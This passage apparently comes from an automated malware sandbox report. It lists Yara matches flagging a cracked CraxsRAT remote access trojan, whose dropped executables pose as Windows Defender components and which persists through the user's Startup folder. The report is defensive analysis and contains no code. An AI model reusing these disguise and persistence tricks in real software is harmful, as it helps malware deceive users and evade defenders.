Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED